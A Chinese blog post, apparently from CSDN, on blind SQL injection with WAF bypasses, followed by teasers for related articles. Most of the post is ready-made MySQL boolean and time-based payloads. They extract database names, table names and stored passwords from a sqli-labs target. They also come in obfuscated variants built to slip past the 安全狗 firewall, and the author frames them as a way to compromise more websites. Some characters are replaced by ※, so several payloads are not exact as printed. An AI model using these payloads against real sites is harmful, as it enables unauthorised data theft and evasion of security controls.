sql注入杂谈(三)--盲注

最新推荐文章于 2022-05-15 15:17:47 发布
最新推荐文章于 2022-05-15 15:17:47 发布
阅读量228 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43570648/article/details/104969302
版权

再讲文章之前,先说说,文章里面被标红的字段,是加了反引号的,(因为被csdn和谐了)还有*号也被和谐了,我是用的※来代替
前面2章已经讲过了union select 以及报错注入的语法以及简单的绕狗方法,现在我来谈谈我对于盲注的看法,网上把盲注的种类分了几种,我在这里就不分了,我就把我自己目前掌握的方法都记录下来,绕狗的一些心得。顺带一提,其实我的盲注其实是很菜的,但是盲注确是很厉害的,因为能union select注入和报错注入的网站,肯定能盲注,但是盲注的网站不一定能用union select以及报错注入拿下,意思就是掌握盲注其实能日的站要广一些。

首先讲讲盲注一些基础的东西,其实我们才学sql注入有的讲师将盲注,就会讲一些很基本的函数,比如left ,length,substr等,盲注函数三剑客。但是只掌握这3个函数,对于我们盲注来说,只能玩玩sqli-labs,其实盲注配合burpsuit基于fuzz看长度来做,为提高很高的效率,不说p话了。

and length(database())=8%23–+ //我们用这个来看看网站当前数据库的长度。如果有waf,一套组合拳

127.0.0.1/sql/Less-1/?id=1’ %0b/※!%26%26※/%0b!!!%23%0aleNGth(database/※※/(/※※/))=8%23–+ //看数据库的长度
length的绕过
然后同样的left函数我们也可以这样绕过

接下来我就讲讲substr这个函数,以及怎么样绕过
and substr((select database()),3,1)=‘c’ --+ //遍历3得到数据库的名字,security
and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>109–+ //得到表 红色的为第一个表的第二字字母,紫色的为第几个表
and 1=(select 1 from information_schema.columns where table_name=‘users’ and column_name regexp ‘^password’ limit 0,1)–+ //查看users表里的字段,password也可以换成username
and ORD(MID((SELECT IFNULL(CAST(password AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68–+ //爆破user表里的password的字段,红色的为Dumb,紫色的为i-kill-you
关于绕狗的几点建议
1.我们首先也可以大小写绕过 suBStr这样

2.函数替代,其实我们的sunstr = substring

3.利用内联注释

4.反引号

5.特殊符号

6.增加函数

and IFNULL((substr((select database()),1,1)=‘s’),0) --+ //增加一个infull函数

and strcmp((substr((select database()),3,1)=‘c’),1)–+ //增加一个strcmp函数

and 0=strcmp((substr((select user()),2,1)=‘o’),0)–+ //这是对于strcmp函数的变形

接下来看绕狗的payload:%0b/※!%26%26*/%0b!!!%23%0a ascii(sUbstRIng((select table_name from (information_schema./※※/tables) where table_schema=database/※※/(/※※/) limit 0,1),2,1))>103–+
绕过的payload
绕过的payload
然后是case when来绕过

and case when (substr((select user()),1,1)=“r”) then sleep(3) else 1 end–+ //用when case绕过

%0b/※!50000|※/%0b!!!/※!case※/%23–hex()%0awhen (sUbsTrinG((select user/※※/(/※※/)),1,1)=“r”) then sleep(3) else 1 end/!13440/–+ //这里就不截图了,但是回显的时间正确的明显比错误的常

利用if来绕过

and If(ascii(length(database()))=56,1,sleep(5))–+ //绕过的payload如上面所演示

基于这一类,我们可以结合burpsuit,就不用等回显,我们直接看长度
利用burpsuit来看length

绕过的方法也如上

因为我的盲注也很弱,所以基于绕过盲注的方法也只有这么一点,但是我还是希望这几篇文章能够帮到一些刚刚学习sql注入的朋友,文章如有错误,还请各位看官斧正.

Aim High
关注
SQL 注入-盲注
Cwillchris的博客
06-04 329
超详细盲注原理讲解
《网络安全自学教程》- SQL注入之布尔盲注原理+步骤+实战操作
最新发布
wangyuxiang946的博客
05-13 5388
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
SQL盲注
CDLittleBoy的博客
05-15 1204
说明 学习思路,源自《白帽子讲Web安全》,lcamry《MySQL注入天书》 1、盲注 注入漏洞不显示来自数据库的报错信息,报错信息中只包含通用的错误提示,此时SQL注入将不能通过报错信息直观获取注入语句的执行结果,既是盲注(Blind Injection)。盲注时不能直观获取结果,但可以通过基于逻辑真假的不同页面表现,来进行结果的判断,从而达到数据获取的目的。 盲注的大致分类有种 1、基于布尔的SQL盲注 2、基于时间的SQL盲注 3、基于报错的SQL盲注 2、基于布尔的MySQL盲注 基本思路是对获
SQL注入——布尔盲注,时间盲注,宽字节注入
18年3月萌新白帽子
06-11 5556
布尔盲注1.布尔盲注利用前提页面没有显示位,没有输出SQL语句执行错误信息,只能通过页面返回正常不正常来判断是否存在注入缺点:速度太慢,消耗大量时间布尔盲注思维导图:布尔盲注常用语句:substr(string,num start,num length)string 为字符串string 为字符串length 为长度ascii( )函数作用:返回字符串str的字符ASCII码值。如果str是空字符...
盲注
weixin_45634365的博客
02-28 4641
一、盲注简介 注入攻击的本质,是把用户输入的数据当做代码执行。 注入攻击的两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据 盲注,就是在服务器没有错误回显的时候完成的注入攻击。服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 与盲注相对应的是显错注入,分别为: union select 联合查询注入 updatexml 报错注入 盲注也分为两种: (1)布尔盲注:只会根据注入信息返回True和False,没有了之前的报错信息 (2)时间盲注:界面返
mysql盲注类型_盲注
weixin_29346059的博客
02-28 477
目录0X01 HTTP POST介绍0X02 POST基于时间的盲注0X03 POST基于布尔的盲注0X04 Sqlmap安全测试0X01 HTTP POST介绍POST 发送数据给服务器处理,数据包含在HTTP信息正文中 POST请求会向指定资源提交数据,请求服务器进行处理,如:表单数据提交、文件上传等,请求数据会被包含在请目录Sql注入什么是Sql注入呢?Sql注入有哪些例子?检索隐藏数据打破...
盲注练习
MD_YAN的博客
07-24 248
1.什么时候使用盲注? 当没有任何报错信息,没有任何输出的时候,只能使用盲注 2.盲注有哪些类型? 布尔盲注 时间盲注 3.报错注入原理是什么? 在 MYSQL 中使用一些指定的函数来制造报错,后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端,从而从报错信息中获取设定的信息。 4.报错注入制造函数有哪些? updatexml(),extractvalue(),floor() ,exp() 5.盲注常用的函数有哪些? 通过长度判断 length():length(database())>=
SQL注入---盲注
qq_41592307的博客
09-04 596
盲注 1、盲注的原理 屏蔽了报错信息,攻击者无法使用报错信息来进行注入判断。 2、盲注的类型 1. Boolean盲注:无论输入什么只会显示真与假 2. 时间盲注:页面没有任何的显示,通过时间的延迟来判断是否存在注入 3、Boolean盲注 3.1、什么是Boolean盲注? 是无论输入什么,结果只返回真和假两种结果。 3.2、Boolean盲注的判断方式 判断数据库名的长度:length(database())>=x ...
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入盲注类型,并...
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
Java写Sql注入时间盲注Demo对Mysql的substring、 case when 、offset、使用以及payload
Recar的博客
05-23 2443
突然想做ctf题遇到了问题。 记录下几个函数的使用substring是切割函数,可以切割指定字符先select version 切割 一定别忘了看用 select 1,1就是说从1开始的到第1个字符改变获取第二个字符依次加就可以一个一个的获取如果在mysql中做判断的话是select (select version())='5.5.40';错误的话返回的是0 case when 是做判
盲注 mysql 密码_Mysql盲注技巧
weixin_29928877的博客
01-27 203
废话少说,直接上代码一、order by 的参数注入技巧:两种方法,思路都一样。example. “select username,password from uc_members order by”.$_GET['oderby']a.常见的利用方法:1.[SQL] select username,password from uc_members order by 1,If((select 1)=...
关于sql注入盲注,谈谈自己的心得
09-07 283
1.没做防御的站点,拿上sqlmap直接怼就行了。 2.做了防御,有的用函数过滤了,有的用了waf(比如安全狗,云锁,华为云waf,360waf,知道创宇盾,护卫神等等) 这些就相当麻烦了,首先要探测出过滤了什么,再去构造sql语句,在本地测试通过后,再一点点完善,最后再去测试目标 举个例子,一个站点过滤了逗号,和单引号,且数据库编码不是GB系列的,这种就不太好操作,个人手工测试,...
14-Web安全——基于Oracle的联合注入,报错注入,盲注
网络安全
07-16 1237
目录 1. 基于ORACLE的sql注入 2. 联合注入 3. 报错注入 1. 基于ORACLE的sql注入 ORACLE是一个关系型数据库,一般会在用户下面生成自己的数据库表,它没有数据库的概念,每个登陆的用户都会有属于自己独立的数据库,不同用户看到的数据库表也不同。 举个例子,如果使用不同用户登陆ORACLE数据库的话,就会看到属于当前用户的数据库: 例如,如果使用ORACLE的系统管理员system用户登陆会看到很多的数据库表,并且这些数据库表只有在登陆system...
SQL injection on DVWA (Low Level)
312小公举的专栏
05-12 1126
首先看看输入正常的ID得到什么结果: 当输入1‘ 时: 说明了这个id的类型是个string,数据库是MySQL 当输入1’ and '1'='1时,and后面的1=1是个永真式: 当输入1‘ or '1'='1是,这个式子是个永真式,返回所有结果: 确定数据表的列数: 输入' union select 1,2 --'
Sql语句之IFNULL() 函数
sinat_34241861的博客
08-11 5510
一、介绍 MySQL IFNULL() 函数用于判断第一个表达式是否为 NULL,如果为 NULL 则返回第二个参数的值,如果不为 NULL 则返回第一个参数的值 IFNULL() 函数语法格式为: IFNULL(expression, alt_value) 参数说明: expression:必须,要测试的值 alt_value:必须,expression 表达式为 NULL 时返回的值 二、举例 第一个参数为 NULL: SELECT IFNULL(NULL, "RUNOOB"); 以上实例输出结
MySQL IFNULL()函数用法MySQL
热门推荐
在路上
07-11 6万+
用法说明1IFNULL(expr1,expr2) 如果 expr1 不是 NULL,IFNULL() 返回 expr1,否则它返回 expr2。 IFNULL()返回一个数字或字符串值,取决于它被使用的上下文环境。 我们先举一些例子: 1mysql> SELECT IFNULL(1,0); 2+-------------+ 3| IFNULL(1,0) | 4+-------------+ 5|
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值